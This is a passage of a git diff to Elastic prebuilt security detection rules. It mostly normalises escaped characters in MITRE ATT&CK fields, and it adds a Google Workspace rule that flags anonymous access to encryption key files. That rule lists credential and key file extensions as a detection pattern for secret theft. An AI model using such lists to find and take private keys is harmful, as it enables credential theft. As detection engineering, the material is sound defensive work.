\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.value : (\n \"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\", \"i386\", \"OneDrive\"\n ) and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background *\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* WebEx */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n )\n )\n", "related_integrations": [ { @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_1.json b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_1.json index 239bd5615e5..58af073a235 100644 --- a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_1.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_2.json b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_2.json index 387c49676cb..d8438836f2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_2.json +++ b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_3.json b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_3.json new file mode 100644 index 00000000000..31c50a91526 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/980b70a0-c820-11ed-8799-f661ea17fbcc_3.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when an external (anonymous) user has viewed, copied or downloaded an encryption key file from a Google Workspace drive. Adversaries may gain access to encryption keys stored in private drives from rogue access links that do not have an expiration. Access to encryption keys may allow adversaries to access sensitive data or authenticate on behalf of users.", + "false_positives": [ + "A user may generate a shared access link to encryption key files to share with others. It is unlikely that the intended recipient is an external or anonymous user." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "eql", + "license": "Elastic License v2", + "name": "Google Workspace Drive Encryption Key(s) Accessed from Anonymous User", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "file where event.dataset == \"google_workspace.drive\" and event.action : (\"copy\", \"view\", \"download\") and\n google_workspace.drive.visibility: \"people_with_link\" and source.user.email == \"\" and\n file.extension: (\n \"token\",\"assig\", \"pssc\", \"keystore\", \"pub\", \"pgp.asc\", \"ps1xml\", \"pem\", \"gpg.sig\", \"der\", \"key\",\n \"p7r\", \"p12\", \"asc\", \"jks\", \"p7b\", \"signature\", \"gpg\", \"pgp.sig\", \"sst\", \"pgp\", \"gpgz\", \"pfx\", \"crt\",\n \"p8\", \"sig\", \"pkcs7\", \"jceks\", \"pkcs8\", \"psc1\", \"p7c\", \"csr\", \"cer\", \"spc\", \"ps2xml\")\n", + "references": [ + "https://support.google.com/drive/answer/2494822" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.drive.visibility", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.user.email", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "980b70a0-c820-11ed-8799-f661ea17fbcc", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "980b70a0-c820-11ed-8799-f661ea17fbcc_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98843d35-645e-4e66-9d6a-5049acd96ce1_1.json b/packages/security_detection_engine/kibana/security_rule/98843d35-645e-4e66-9d6a-5049acd96ce1_1.json index 3999875fd7f..d3dc119ea04 100644 --- a/packages/security_detection_engine/kibana/security_rule/98843d35-645e-4e66-9d6a-5049acd96ce1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/98843d35-645e-4e66-9d6a-5049acd96ce1_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_103.json b/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_103.json index 187b637ac13..4af3e238968 100644 --- a/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_104.json b/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_104.json index 5437d1f405d..3d9b5ae459e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9890ee61-d061-403d-9bf6-64934c51f638_104.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_101.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_101.json index b0bde1bf058..fde728dcae8 100644 --- a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_101.json +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_102.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_102.json index a729bbb5e09..e842959238b 100644 --- a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_102.json +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_105.json b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_105.json index 85efda3a289..16cd55e8945 100644 --- a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_105.json +++ b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_105.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_106.json b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_106.json index b731f4fe502..133849155c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_106.json +++ b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_106.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_107.json b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_107.json index 241149e7d9b..bcb78693efc 100644 --- a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_107.json +++ b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_107.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_208.json b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_208.json index 0bc31588de8..c092ac1650e 100644 --- a/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_208.json +++ b/packages/security_detection_engine/kibana/security_rule/98fd7407-0bd5-5817-cda0-3fcc33113a56_208.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_100.json b/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_100.json index 38984f0fe62..61b18046803 100644 --- a/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_100.json +++ b/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_101.json b/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_101.json index 84e5dae0ce1..6713e5a7156 100644 --- a/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_101.json +++ b/packages/security_detection_engine/kibana/security_rule/990838aa-a953-4f3e-b3cb-6ddf7584de9e_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_102.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_102.json index d2e3f8ebbc7..74311d15b52 100644 --- a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_102.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_103.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_103.json index df82b05b863..2e2c0293a84 100644 --- a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_103.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_104.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_104.json index 2d04209a553..d7da84504f1 100644 --- a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_104.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_105.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_105.json index 2d80649bfd1..5b0051c0a03 100644 --- a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_105.json +++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_105.json @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_1.json b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_1.json index 9ede8bec11d..ae9e79997c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_1.json +++ b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_1.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score", "note": "", - "query": "process where ((problemchild.prediction == 1 and problemchild.prediction_probability \u003e 0.98) or\nblocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "query": "process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or\nblocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", "https://docs.elastic.co/en/integrations/problemchild", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_103.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_103.json index 06b5b0c3743..37ae3e7ad37 100644 --- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_103.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_104.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_104.json index 1412faa657a..79fa2f6a630 100644 --- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_104.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_105.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_105.json index a412674cf38..7efd22525dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_105.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_206.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_206.json index 717b7fabcb3..3dab9688b65 100644 --- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_206.json +++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_206.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_207.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_207.json index 7c5dccf6aec..9781b84af5b 100644 --- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_207.json +++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_207.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_208.json b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_208.json index b410bd1ccca..7e6b9ab97d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_208.json +++ b/packages/security_detection_engine/kibana/security_rule/9960432d-9b26-409f-972b-839a959e79e2_208.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "9960432d-9b26-409f-972b-839a959e79e2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_102.json b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_102.json index 743296e563f..8655a0b691c 100644 --- a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_102.json +++ b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_102.json @@ -30,7 +30,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_103.json b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_103.json index 1ba30115b6e..69ecdb6aac1 100644 --- a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_103.json @@ -30,7 +30,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_104.json b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_104.json index fd6b24b1c0a..460459b73d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/99dcf974-6587-4f65-9252-d866a3fdfd9c_104.json @@ -44,7 +44,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9a3884d0-282d-45ea-86ce-b9c81100f026_1.json b/packages/security_detection_engine/kibana/security_rule/9a3884d0-282d-45ea-86ce-b9c81100f026_1.json index 31776691a9d..75f164bc958 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a3884d0-282d-45ea-86ce-b9c81100f026_1.json +++ b/packages/security_detection_engine/kibana/security_rule/9a3884d0-282d-45ea-86ce-b9c81100f026_1.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_105.json b/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_105.json index 6b697d8613b..e22d793d35e 100644 --- a/packages/security_detection_engine/kibana/security_rule/9a3a3689-8ed1-4cdb-83fb-9506db54c61f_105.json +++ 